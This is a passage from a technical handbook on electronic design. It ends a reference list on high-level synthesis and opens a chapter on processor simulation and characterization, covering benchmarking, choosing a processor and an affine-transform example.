Canis A, Brown SD, Anderson JH (2014) Modulo SDC scheduling with recurrence minimization
in high-level synthesis. In: Proceedings of the IEEE international conference on field
programmable logic and applications (FPL), pp 1–8
Carloni LP (2015) From latency-insensitive design to communication-based system-level design.
Proc IEEE 103(11):2133–2151
Chang E-S, Gajski DD, Narayan S (1996) An optimal clock period selection method based on
slack minimization criteria. ACM Trans Des Autom Electron Syst (TODAES) 1(3):352–370
Chatarasi P, Neuendorffer S, Bayliss S, Vissers K, Sarkar V (2020) Vyasa: a high-performance
vectorizing compiler for tensor convolutions on the Xilinx AI engine
Chen D, Cong J (2004) Register binding and port assignment for multiplexer optimization. In:
Proceeding of the Asia and South Pacific design automation conference (ASPDAC), pp 68–73
Chen W, Ray S, Bhadra J, Abadir M, Wang L (2017) Challenges and trends in modern SoC design
verification. IEEE Des Test 34(5):7–22
Chen J, Zaman M, Makris Y, Blanton RDS, Mitra S, Schafer BC (2020) DECOY: DEflection-
Driven HLS-Based Computation Partitioning for Obfuscating Intellectual Property. In:
Proceedings of the ACM/IEEE design automation conference (DAC), pp 1–6
870 C. Pilato and S. Soldavini
Choi J, Brown SD, Anderson JH (2017) From pthreads to multicore hardware systems in legup
high-level synthesis for FPGAs. IEEE Trans Very Large Scale Integr (VLSI) Syst 25(10):
2867–2880
Cilardo A, Flich J, Gagliardi M, Gavila RT (2015) Customizable heterogeneous acceleration for
tomorrow’s high-performance computing. In: Proceedings of the IEEE international conference
on high performance computing and communications (HPCC), pp 1181–1185
Cong J (2015) High-level synthesis and beyond – from datacenters to IoTs. In: Proceedings of the
IEEE international system-on-chip conference (SOCC), pp 1–1
Cong J, Zhang Z (2006) An efficient and versatile scheduling algorithm based on SDC formulation.
In: Proceedings of the ACM/EDAC/IEEE design automation conference (DAC), pp 433–438
Cong J, Fan Y, Han G, Jiang W, Zhang Z (2006) Platform-based behavior-level and system-level
synthesis. In: Proceedings of the IEEE international SOC conference, pp 199–202
Cong J, Liu B, Neuendorffer S, Noguera J, Vissers K, Zhang Z (2011) High-level synthesis for
FPGAs: from prototyping to deployment. IEEE Trans Comput-Aided Des Integr Circuits Syst
30(4):473–491
Cong J, Huang M, Pan P, Wang Y, Zhang P (2016) Source-to-source optimization for
HLS, pp 137–163
Cota EG, Mantovani P, Guglielmo GD, Carloni LP (2015) An analysis of accelerator coupling
in heterogeneous architectures. In: Proceedings of the ACM/EDAC/IEEE design automation
conference (DAC)
Coussy P, Chavet C, Bomel P, Heller D, Senn E, Martin E (2008) GAUT: a high-level synthesis
tool for DSP applications, pp 147–169
Dai S, Liu G, Zhang Z (2018) A scalable approach to exact resource-constrained scheduling
based on a joint SDC and SAT formulation. In: Proceedings of the ACM/SIGDA international
symposium on field programmable gate arrays (FPGA), pp 137–146
Dally WJ, Turakhia Y, Han S (2020) Domain-specific hardware accelerators. Commun ACM 63
(7):48–57. ISSN 0001-0782
De Micheli G (1993) High-level synthesis of digital circuits. In: Advances in computers, vol 37.
Elsevier, The Netherlands, pp 207–283
de Fine Licht J, Besta M, Meierhans S, Hoefler T (2021) Transformations of high-level synthesis
codes for high-performance computing. IEEE Trans Parallel Distrib Syst 32(05):1014–1029
Edwards SA (2006) The challenges of synthesizing hardware from c-like languages. IEEE Des
Test 23(5):375–386
Edwards SA, Townsend R, Barker M, Kim MA (2019) Compositional dataflow circuits. ACM
Trans Embed Comput Syst (TECS) 18(1):1–27
Ernst D, Kim NS, Das S, Pant S, Rao R, Pham T, Ziesler C, Blaauw D, Austin T, Flautner K, Mudge
T (2003) Razor: a low-power pipeline based on circuit-level timing speculation. In: Proceedings
of the annual IEEE/ACM international symposium on microarchitecture (MICRO), pp 7–18
Esmaeilzadeh H, Blem E, St. Amant R, Sankaralingam K, Burger D (2012) Dark silicon and the
end of multicore scaling. IEEE Micro 32(3):122–134
Fezzardi P, Castellana M, Ferrandi F (2015) Trace-based automated logical debugging for high-
level synthesis generated circuits. In: Proceedings of the IEEE international conference on
computer design (ICCD), pp 251–258
Gajski DD (1984) Silicon compilers and expert systems for VLSI. In: Proceedings of the
ACM/EDAC/IEEE design automation conference (DAC), pp 86–87
Galuzzi C, Panainte EM, Yankova Y, Bertels K, Vassiliadis S (2006) Automatic selection
of application-specific instruction-set extensions. In: Proceedings of the IEEE/ACM/IFIP
international conference on hardware/software codesign and system synthesis (CODES+ISSS),
pp 160–165
Genc H, Haj-Ali A, Iyer V, Amid A, Mao H, Wright J, Schmidt C, Zhao J, Ou A, Banister M, Shao
YS, Nikolic B, Stoica I, Asanovic K (2019) Gemmini: an agile systolic array generator enabling
systematic evaluations of deep-learning architectures. arXiv preprint arXiv:1911.09925
Giri D, Chiu KL, Di Guglielmo G, Mantovani P, Carloni LP (2020) ESP4ML: platform-
based design of systems-on-chip for embedded machine learning. In: Proceedings of the
ACM/EDAC/IEEE design, automation & test conference in Europe (DATE), pp 1049–1054
24 Accelerator Design with High-Level Synthesis 871
Guglielmo GD, Pilato C, Carloni LP (2014) A design methodology for compositional high-level
synthesis of communication-centric SoCs. In: Proceedings of the ACM/EDAC/IEEE design
automation conference (DAC), pp 1–6
Gupta S, Dutt N, Gupta R, Nicolau A (2003) Spark: a high-level synthesis framework for applying
parallelizing compiler transformations. In: Proceedings of the international conference on VLSI
design, pp 461–466
Hadjis S, Canis A, Sobue R, Hara-Azumi Y, Tomiyama H, Anderson JH (2015) Profiling-driven
multi-cycling in FPGA high-level synthesis. In: Proceedings of the ACM/EDAC/IEEE design,
automation & test conference in Europe (DATE), pp 31–36
Hameed F, Khan AA, Castrillon J (2018) Performance and energy-efficient design of STT-RAM
last-level cache. IEEE Trans Very Large Scale Integr (VLSI) Syst 26(6):1059–1072
Horowitz M (2014) 1.1 computing’s energy problem (and what we can do about it). In: Proceedings
of the IEEE international solid-state circuits conference digest of technical papers (ISSCC),
pp 10–14
Hsiao H, Anderson JH (2019) Thread weaving: static resource scheduling for multithreaded high-
level synthesis. In: Proceedings of the ACM/EDAC/IEEE design automation conference (DAC)
Huang Q, Lian R, Canis A, Choi J, Xi R, Calagar N, Brown SD, Anderson JH (2015) The effect
of compiler optimizations on high-level synthesis-generated hardware. ACM Trans Reconfig
Technol Syst (TRETS) 8(3):14:1–14:26
Jiang Z, Dai S, Suh GE, Zhang Z (2018) High-level synthesis with timing-sensitive information
flow enforcement. In: Proceedings of the IEEE/ACM international conference on computer-
aided design (ICCAD), pp 1–8
Josipovic L, Brisk P, Ienne P (2017a) From c to elastic circuits. In: Proceedings of the asilomar
conference on signals, systems, and computers (ACSSC), pp 121–125
Josipovic L, Brisk P, Ienne P (2017b) An out-of-order load-store queue for spatial computing.
In: Proceedings of the IEEE symposium on field-programmable custom computing machines
(FCCM), pp 134–134
Josipović L, Ghosal R, Ienne P (2018) Dynamically scheduled high-level synthesis. In:
Proceedings of the ACM/SIGDA international symposium on field programmable gate arrays
(FPGA), pp 127–136
Klimovic A, Anderson JH (2013) Bitwidth-optimized hardware accelerators with software fall-
back. In: Proceedings of the IEEE international conference on field-programmable technology
(FPT), pp 136–143
Koeplinger D, Feldman M, Prabhakar R, Zhang Y, Hadjis S, Fiszel R, Zhao T, Nardi L, Pedram A,
Kozyrakis C, Olukotun K (2018) Spatial: a language and compiler for application accelerators.
In: Proceedings of the ACM SIGPLAN conference on programming language design and
implementation (PLDI), pp 296–311. ISBN 9781450356985
Kotsifakou M, Srivastava P, Sinclair MD, Komuravelli R, Adve V, Adve S (2018) HPVM:
heterogeneous parallel virtual machine. In: Proceedings of the ACM SIGPLAN symposium
on principles and practice of parallel programming (PPoPP), pp 68–80
Ku DC, Micheli GD (1991) Constrained resource sharing and conflict resolution in hebe.
Integration 12(2):131–165
Lattner C, Amini M, Bondhugula U, Cohen A, Davis A, Pienaar J, Riddle R, Shpeisman T,
Vasilache N, Zinenko O (2020) Mlir: a compiler infrastructure for the end of Moore’s law
Lattner C, Amini M, Bondhugula U, Cohen A, Davis A, Pienaar J, Riddle R, Shpeisman T,
Vasilache N, Zinenko O (2021) MLIR: scaling compiler infrastructure for domain specific
computation. In: Proceedings of the IEEE/ACM international symposium on code generation
and optimization (CGO), pp 2–14
Lattuada M, Ferrandi F (2015) Code transformations based on speculative SDC scheduling. In:
Proceedings of the IEEE/ACM international conference on computer-aided design (ICCAD),
pp 71–77
Lattuada M, Ferrandi F (2019) A design flow engine for the support of customized dynamic high
level synthesis flows. ACM Trans Reconfig Technol Syst (TRETS) 12(4):1–26
872 C. Pilato and S. Soldavini
Liu J, Cong J (2019) Dataflow systolic array implementations of matrix decomposition using
high level synthesis. In: Proceedings of the ACM/SIGDA international symposium on field
programmable gate arrays (FPGA), p 187
Makrani HM, Sayadi H, Mohsenin T, Rafatirad S, Sasan A, Homayoun H (2019) XPPE:
cross-platform performance estimation of hardware accelerators using machine learning. In:
Proceedings of the 24th Asia and South Pacific design automation conference (ASPDAC)
Mantovani P, Cota EG, Pilato C, Guglielmo GD, Carloni LP (2016a) Handling large data sets for
high-performance embedded applications in heterogeneous systems-on-chip. In: Proceedings
of the international conference on compliers, architectures, and sythesis of embedded systems
(CASES), pp 3:1–3:10
Mantovani P, Cota EG, Tien K, Pilato C, Guglielmo GD, Shepard K, Carloni LP (2016b) An
FPGA-based infrastructure for fine-grained DVFS analysis in high-performance embedded
systems. In: Proceedings of the ACM/EDAC/IEEE design automation conference (DAC)
Mantovani P, Giri D, Di Guglielmo G, Piccolboni L, Zuckerman J, Cota EG, Petracca M, Pilato C,
Carloni LP (2020) Agile SoC development with open ESP. In: Proceedings of the IEEE/ACM
international conference on computer-aided design (ICCAD), pp 1–6
Martin G, Smith G (2009) High-level synthesis: past, present, and future. IEEE Des Test Comput
26(4):18–25
Minutoli M, Castellana VG, Tumeo A, Ferrandi F (2015) Inter-procedural resource sharing in high
level synthesis through function proxies. In: Proceedings of the IEEE international conference
on field programmable logic and applications (FPL), pp 1–8
Minutoli M, Castellana VG, Tumeo A, Lattuada M, Ferrandi F (2016) Efficient synthesis of graph
methods: a dynamically scheduled architecture. In: Proceedings of the IEEE/ACM international
conference on computer-aided design (ICCAD)
Nane R, Sima VM, Pilato C, Choi J, Fort B, Canis A, Chen YT, Hsiao H, Brown S, Ferrandi F,
Anderson J, Bertels K (2016) A survey and evaluation of FPGA high-level synthesis tools.
IEEE Trans Comput-Aided Des Integr Circuits Syst 35(10):1591–1604
Ndu G (2012) Boosting single thread performance in mobile processors using reconfigurable
acceleration. PhD thesis, 10
Pilato C (2017) Bridging the gap between software and hardware designers using high-level
synthesis. In: Proceedings of the international conference on parallel computing (PARCO),
pp 622–631
Pilato C, Ferrandi F (2013) Bambu: a modular framework for the high level synthesis of
memory-intensive applications. In: Proceedings of the IEEE international conference on field
programmable logic and applications (FPL), pp 1–4
Pilato C, Tumeo A, Palermo G, Ferrandi F, Lanzi PL, Sciuto D (2008) Improving evolutionary
exploration to area-time optimization of FPGA designs. J Syst Archit Embed Syst Des 54(11):
1046–1057
Pilato C, Castellana VG, Lovergine S, Ferrandi F (2011a) A runtime adaptive controller for
supporting hardware components with variable latency. In: Proceedings of the NASA/ESA
conference on adaptive hardware and systems (AHS), pp 153–160
Pilato C, Ferrandi F, Sciuto D (2011b) A design methodology to implement memory accesses
in high-level synthesis. In: Proceedings of the IEEE/ACM/IFIP international conference on
hardware/software codesign and system synthesis (CODES+ISSS), pp 49–58
Pilato C, Mantovani P, Guglielmo GD, Carloni LP (2017) System-level optimization of accelerator
local memory for heterogeneous systems-on-chip. IEEE Trans Comput-Aided Des Integr
Circuits Syst 36(3):435–448
Pilato C, Garg S, Wu K, Karri R, Regazzoni F (2018a) Securing hardware accelerators: a new
challenge for high-level synthesis. IEEE Embed Syst Lett 10(3):77–80
Pilato C, Basu K, Shayan M, Regazzoni F, Karri R (2018b) High-level synthesis of benevolent
trojans. In: Proceedings of the ACM/EDAC/IEEE design, automation & test conference in
Europe (DATE), pp 1124–1129
Pilato C, Regazzoni F, Karri R, Garg S (2018c) TAO: techniques for algorithm-level obfuscation
during high-level synthesis. In: Proceedings of the ACM/EDAC/IEEE design automation
conference (DAC), pp 1–6
24 Accelerator Design with High-Level Synthesis 873
Pilato C, Wu K, Garg S, Karri R, Regazzoni F (2019) TaintHLS: high-level synthesis for dynamic
information flow tracking. IEEE Trans Comput-Aided Des Integr Circuits Syst 38(5):798–808
Pilato C, Bohm S, Brocheton F, Castrillon J, Cevasco R, Cima V, Cmar R, Diamantopoulos D,
Ferrandi F, Martinovic J, Palermo G, Paolino M, Parodi A, Pittaluga L, Raho D, Regazzoni F,
Slaninova K, Hagleitner C (2021) EVEREST: a design environment for extreme-scale big data
analytics on heterogeneous platforms. In: Proceedings of the design, automation, and test in
Europe conference and exhibition (DATE)
Pothineni N, Brisk P, Ienne P, Kumar A, Paul K (2010) A high-level synthesis flow for custom
instruction set extensions for application-specific processors. In: Proceedings of the IEEE Asian
and South Pacific design automation conference (ASP-DAC), pp 707–712
Pu J, Bell S, Yang X, Setter J, Richardson S, Ragan-Kelley J, Horowitz M (2017) Programming
heterogeneous systems from an image processing DSL. ACM Trans Archit Code Optim 14
(3):1–25
Ragan-Kelley J, Barnes C, Adams A, Paris S, Durand F, Amarasinghe S (2013) Halide: a language
and compiler for optimizing parallelism, locality, and recomputation in image processing
pipelines. In: Proceedings of the ACM SIGPLAN conference on programming language design
and implementation (PLDI), pp 519–530. ISBN 9781450320146
Ranjan Panda P, Dutt ND, Nicolau A (1998) Incorporating dram access modes into high-level
synthesis. IEEE Trans Comput-Aided Des Integr Circuits Syst 17(2):96–109
Stok L (1994) Data path synthesis. Integration 18(1):1–71
Venkatesan R, Shao YS, Wang M, Clemons J, Dai S, Fojtik M, Keller B, Klinefelter A, Pinckney
N, Raina P, Zhang Y, Zimmer B, Dally WJ, Emer J, Keckler SW, Khailany B (2019) Magnet:
a modular accelerator generator for neural networks. In: Proceedings of the IEEE/ACM
international conference on computer-aided design (ICCAD), pp 1–8
Weerasinghe J, Polig R, Abel F, Hagleitner C (2016) Network-attached FPGAs for data center
applications. In: Proceedings of the international conference on field-programmable technology
(FPT), pp 36–43
Windh S, Ma X, Halstead RJ, Budhkar P, Luna Z, Hussaini O, Najjar WA (2015) High-level
language tools for reconfigurable computing. Proc IEEE 103(3):390–408
Zhu J, Gajski DD (1999) A unified formal model of ISA and FSMD. In: Proceedings of the seventh
international workshop on hardware/software codesign (CODES), pp 121–125
Processor Simulation and Characterization
25
Grant Edmund Martin, Suhas Madhusudana, Greg Efland,
and Vadim Kustov
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 876
Application and Algorithm Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 879
Data Types and Operations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 879
Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 880
Example: Affine Transform of 2D Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 881
New or Existing Processor? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 882
Existing Processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 882
Extending Configurable Processor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 883
New Processor with New ISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 883
Hybrid Mode: New ISA with Custom Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 884
Standard Benchmarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 884
Issues with Estimating Processor Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 884
Whetstone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 888
Linpack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 888
Dhrystone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 888
CoreMark . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 889
Embench . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 890
SPEC CPU . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 891
EEMBC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 892
Berkeley Design Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 892
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 892
Using Application Code for Benchmarking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 893
Estimation Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 893
Examples of Estimation Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 895
For Further Consideration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 901
G. E. Martin ()
Pleasanton, CA, USA
e-mail: [email protected]
S. Madhusudana · G. Efland · V. Kustov
Cadence Design Systems, Tensilica R&D, San Jose, CA, USA
e-mail: [email protected]; [email protected]; [email protected]
Abstract
Keywords
Introduction
Design of electronic systems in the third decade of the twenty-first century almost
inevitably requires a design team to choose one or more embedded processors,
potentially of various kinds (CPU, DSP, GPU, specialized application processors),
as part of the design decomposition and functionality mapping (often known as
hardware-software codesign). The world offers a huge variety of choices to design
teams despite the consolidation among processor instruction set architectures (ISAs)
that has occurred over the past two decades. Teams may want to design a brand-new
processor with a brand-new ISA, although this has become less and less common.
Teams may be constrained to choose among existing processor implementations,
either at the full chip/system-on-chip (SOC) level with fully packaged processors,
or as intellectual property (IP) blocks already predetermined as a design constraint.
25 Processor Simulation and Characterization 877
On the other hand, teams may be able to use configurable and extensible processor
technology to create derivatives of existing processor ISAs: they may choose coarse-
grained processor parameters or even add new application-oriented instructions to
the ISA to fit the design needs. For example, they may tune the sizes of caches and
local tightly coupled memories to ensure that a deeply embedded processor has just
enough memory for its applications, but no more. If their application emphasizes
floating point operations, they may turn on an IEEE 754 single-precision floating-
point ISA option. If they are using a preconfigured neural net acceleration processor,
they may have proprietary NN models which would benefit greatly in performance
and power by adding proprietary accelerating instructions using an architectural
description language (ADL).
Whether choosing among constrained existing alternatives or given more lati-
tude in choosing to design a brand-new processor or creating a derivative using
configurable technology, it is vital to take a data-driven approach to making
these design decisions. Characterizing design alternatives for the optimal fit to
the design requirements is a vital step. Where a great deal is known about the
intended application space, the best results are found when drawing from existing
or developing new application-oriented benchmarks. Where the application space is
so general purpose that it is unclear what the best measurement criteria are to use
for judgment, standard benchmarks may represent the only reasonable alternative,
although even there, the choice of which benchmark(s) to use is important. Many
benchmarks have been proposed and used for the last several decades, and they
have risen into and fallen out of favor. Even where application-oriented benchmarks
are available or newly written, it may be important to characterize the processor
choices using standard benchmarks because high performance on them, even if not
particularly relevant to the use cases, may be necessary for promoting the resulting
product to end design teams or to demonstrate some level of “future-proofing” by
showing high general purpose performance.
For existing designs, especially if implemented in packaged chips, running the
benchmarks may be relatively straightforward and design choices easy to justify. For
IP choices, especially with newly configured processor ISAs, use of various models
is necessary and their fidelity to the ultimate physical expression is an important
criterion in justifying such choices.
Having extracted a variety of benchmark data across the range of credible
processor choices, it is important that a design team have a defensible analysis
method to allow optimal choices to be made while considering the various aspects
of performance, power, and area (PPA), and execution speed estimates derived from
the models. Objective numerical criteria must be supplemented by more subjective
qualitative criteria to justify the choice ultimately made, and it is important to use
consensus weightings for the criteria to justify the decisions made.
The need to justify decisions rests partly on the tools used to measure perfor-
mance, including processor simulators which exist at wide variety of levels. The
Chap. 26, “Methodologies for Design Space Exploration” by Andy Pimentel
outlines the importance of processor simulation in design space exploration and
summarizes several levels, including:
878 G. E. Martin et al.
• RTL level
• Cycle-accurate instruction set simulation (ISS)
• ISS using binary translation (functional level, sometimes regarded as emulators)
• Host-compiled simulation where the functional ISS approach is combined with
the target application code
• Trace-based simulation as opposed to the previous execution-based approaches
• Sampled simulation
• Statistical simulation
Application
on analysis:
• Data types
• Algorithms
Simulate benchmar
benchmarks
marks on processor: Iterate
• Choose model(s)
which determine the performance of the applications. The next step is to choose
whether this design project will use existing processors or SoC devices with already
determined processor choices, or whether we could create new processors, probably
using a commercial or noncommercial extensible processor as a base.
Depending on the nature of the design project, we might choose to decide on
processors using standard benchmarks, or we may choose using application-oriented
benchmarks for which we may need to develop the code for it. It is possible that we
may use a combination of both types of benchmarks. Measurements are derived
using appropriate models of the processor choices, of which there are several types
as discussed. The chapter will detail the several types of models that are possible.
Using the measurements, if the design project is using existing processors as
a design space, then a final choice is possible. If an extensible processor is being
used, then there is an interesting iterative loop in which the ISA may be extended
and the application performance is remeasured using updated models, which should
eventually terminate in a well-defined extended, configured processor which will be
used in the final design.
Finally, prior to the conclusion, we will illustrate several of these concepts
using examples of configurable and extensible processors with a wide variety of
application domains (audio, imaging and computer vision, communications, sensor
and signal processing, and AI/ML) as the basis for a discussion. A set of useful
references ends the chapter.
The starting point for performance characterization is always the intended applica-
tions. These may be existing or newly developed applications. Although we open
with data types rather than algorithms, in fact these are heavily interrelated. A high-
level algorithm may be chosen for the application, then the data type requirements
for accuracy and precision studied, and then the details of the algorithm fleshed out
to accommodate the data type characteristics.
Algorithms
Algorithms are closely linked to the data types and operations they use. In fact,
different algorithms may be necessary to best exploit the operations and data types
available to a given processor.
For example, consider implementing the affine transform on a two-dimensional
(2D) image (Wolberg 1990). A common approach is to interpolate the value of the
corresponding pixel in the input image for each position in the output image using
the inverse mapping. This can be done directly as a 2D interpolation or with a two-
pass approach of one-dimensional (1D) interpolations. The former can be efficient
on a vector processor when gather instructions are provided, while the latter 1D
approach may be more efficient when gather instructions either are not available or
have limited throughput.
Understanding the target applications and their requisite algorithms and data
types is key to the selection of the benchmarks used for processor performance
analysis. Existing benchmarks may be similar to or match the target but use different
algorithms or data types and thus not be representative of actual performance. If no
existing benchmark can be found, it may be necessary to create one.
Analysis of algorithm complexity is often useful to judge feasibility and guide
processor selection. Algorithm complexity can include types and numbers of
operations (e.g., number of 16-bit fixed-point multiply-accumulates (MACs)) and
memory sizes. This can also be used to evaluate benchmark results on a given
processor – for example, what utilization of the processor resources is achieved.
As an example, one can imagine a controller which controls the position of
a wide-angle camera and communicates with the user, who controls the camera
via the controller. Once frames from the camera are captured and written to a
memory accessible by the controller, the captured raw frames may not be convenient
for viewing by a human observer, because the viewing position of the camera
undergoes high-speed changes as the car moves. Without some form of digital image
stabilization, the output video may look jerky and distorted.
25 Processor Simulation and Characterization 881
⎛ ⎞ ⎛ ⎞⎛ ⎞
x af 11 af 12 bf 1 n
⎝ y ⎠ = ⎝ af 21 af 22 bf 2 ⎠ ⎝ m ⎠
z 0 0 1 1
for y 0..H-1
for x 0..W-1
# compute corresponding position in source image (xs,ys)
float xs = ar11*x + ar12*y + ar13;
float ys = ar21*x + ar22*y + ar23;
Here the inverse mapping is used to determine the corresponding position of each
output pixel in the input image. The value of the corresponding input pixel at this
position is interpolated, in this example using simple bilinear interpolation of the
four nearest neighboring pixel values.
This description uses floating-point values to represent the mapping parameters
and the corresponding input positions, and to perform the interpolation. While this
may be an appropriate choice for a processor with good support for floating-point
types and operations, it may be better to use fixed-point types on processors without
hardware floating-point support. In this case, one needs to determine the range and
precision requirements based on image sizes and interpolation quality to determine
the appropriate fixed-point formats.
The complexity of the transform kernel includes several steps. The first step is
evaluation of the inverse mapping to compute the corresponding position in the
source image. As written, this requires four multiplications and four additions.
However, these positions can be incrementally calculated using simple additions
for each iteration of the nested loops. This reduces the complexity to two additions
in the inner loop and two in the outer loop.
The next step is to compute the positions of the nearest neighbors and read
them from the source image. This includes two operations to separate the positions
into integer and fractional components. Reading the source image values requires
additions of a constant – often this can be done with an addressing mode.
The final step is to interpolate the value given the values of the four neighbors and
write the result to the destination image. As written, the interpolation requires three
multiplications and six additions. Note, however, the difference input to each of the
multiplications requires a larger range to represent than the individual pixel values
and may be problematic; an alternative is to use two separate multiplications for
each instead. Some processors may provide fused difference-multiply instructions
or even full interpolation instructions to optimize handling of such cases.
Algorithm complexity analysis is useful for estimating the first-order computa-
tion requirements of an application as a guide for initial processor selection and
evaluation. The specifics of a processor will be considered in subsequent analysis
and benchmarking.
In a nutshell, there are four prominent use cases that are important in choosing
processors.
Existing Processor
Choosing existing and stable processors, possibly as packaged parts (or portions
of packaged SoCs which will be used for an application). For example, Mediatek
and Qualcomm both offer packaged chips which include application processors for
25 Processor Simulation and Characterization 883
mobile devices. Both use variants of Arm cores and are available in multiprocessor
configurations (Mediatek 2020, Qualcomm 2020). For a mobile device design, an
OEM may wish to choose the provider of their application processor SoC and
then choose which among their various offerings is the best combination of price,
performance, future capacity, power consumption, and ease of programming, for
example. While performance is not the only criterion to use, it is certainly an
important one and thus characterizing the variety of application processors on offer
to help find the best match to the mobile product requirements is an essential use
case.
It is also quite possible that a design team is planning to develop their own SoC
but will want to choose one of several preconfigured instruction set processors avail-
able as intellectual property from different vendors (e.g., Arm, Cadence-Tensilica,
Ceva, Synopsys-ARC), without wanting to make any particular extensions, and may
make modest configuration choices such as memory sizes. In this case, they can
be regarded in almost the same way as prepackaged, pre-built SoCs, albeit with
slightly more variation possible in configuring some of the design characteristics.
Again, choice must be made among vendors and then among possible configurations
available from the chose vendor, and various characteristics will be important, of
which performance is only one.
The option of designing a new processor, with a new instruction set architecture
(ISA), has declined in favor over time. This is due to the high costs of developing
a processor design and implementation from scratch, verifying it, and developing
and supporting the complete software (SW) toolchain for it – (compiler, assembler,
disassembler, debugger, IDE, instruction set simulator(s)). However, there are
commercial ADL-based toolsets that make this option easier: for example, Synopsis
884 G. E. Martin et al.
ASIP Designer, based on the nml ADL (Synopsys 2021); and Codasip’s Codasip
Studio, using the CodAL ADL (Codasip 2021).
However, over the last several years, new options have arisen that reflect a hybrid
between a brand-new ISA and choosing only existing processor implementations.
RISC-V, for example, (RISC-V 2020) allows a design team to pick a well-defined
base ISA with some well-defined configurable additions (growing over time) and
then extend it further with proprietary custom ISA, while still benefiting from third
party, often open source, SW tooling. In addition, there are a variety of third party,
often open source, but also commercial, IP offerings in the RISC-V domain (RISC-
V Exchange 2020), which can be used as-is, configured and extended by the end
user group, or by a commercial supplier, thus offering a credible hybrid model for
design groups interested in this approach.
Standard Benchmarks
Before going into detail on the available standard benchmarks and their use cases,
we will discuss generally how to estimate and measure processor performance as an
aid to making processor selection, and the general issues with estimating processor
performance. This is used to motivate the use of standard benchmarks, and we
describe several used historically and more recently. In many cases, the standard
benchmark numbers may be sufficient for making processor choices; in other cases,
moving to application-specific benchmarks may be needed to make the right choice.
This is the topic for the next section.
About two decades ago, it was common for processor vendors to advertise the
performance of their products by stating how many instructions per second the
processor could execute. Some customers, especially start-up companies, based
their choice of the processor on this criterion alone, only to find later that processors
capable of executing fewer instructions per second (commonly measured in millions
of instructions per second or MIPS) outperformed processors capable of more MIPS
on their tasks. Nowadays, MIPS is still looked upon as the first step in evaluating
processor choice or design, but MIPS is almost never used as a single performance
measure, because it does not distinguish between the types of instructions and
architectures of the processors.
To illustrate the problem, let us consider a task of subtracting two images. This
task is common in video compression (such as MPEG-2, H.264, H.265) where a
motion-compensated picture is subtracted from the original uncompressed picture
25 Processor Simulation and Characterization 885
to form a residual signal, which is then quantized and encoded. If the pictures are
more than 8 bits per pixel, and processor A has an ISA that only has an 8-bit subtract
instruction, processor B has a 32-bit subtract instruction, and processor C has an
instruction that performs multiple 32-bit subtractions in one cycle, it will take the
smallest number of instructions to subtract the pictures using processor C, more
instructions on processor B, and the highest number of instructions on processor A.
Processor A may be capable of the highest number of MIPS (for example because
it can operate at a higher frequency), while processor C will perform the task of
subtracting images faster because it will need to execute fewer instructions.
Often processor vendors characterize the performance not in instructions per
second but operations per second. This metric will consider processor C’s capability
of performing multiple operations within a single instruction, and multiply the
number of operations in the instruction by the number of instructions per second
(typically measured in giga or tera operations per seconds: GOPs or TOPs). This
metric gives a better insight into the processor’s resources, but still falls short of
predicting performance on a specific task, since it is a measure of computational
resources, not of architectural fit. As an example, one can imagine two machines
both capable of executing one GOP, the first machine executing 1000 single
operation MIPS, the other 100 MIPS, each a 10-way single instruction multiple
data (SIMD) instruction. If otherwise the architectures of the two machines are
similar, they will have a similar performance in subtracting two images. However,
given an algorithm with high data dependencies, such as entropy coding, it will be
difficult to schedule 10 operations in parallel, and the computational resources of
the SIMD machine will be underutilized giving the machine with a single operation
per instruction running at a higher frequency a performance advantage.
Modern applications, such as video compression, robotic vision, audio com-
pression, graphics, and neural networks, in their entirety are far more complicated
than subtracting two images or entropy coding. Choosing the right architecture for
specific applications is an extremely important task. Even if a processor meets the
computational budget to perform the task, it can be an overkill for the task resulting
in idle resources, increased power consumption, area, and cost.
Several decades ago, professionals developing processor hardware as well as
software architects who used the processors started to look at a unified way to
characterize performance of processors, searching for applications (benchmarks)
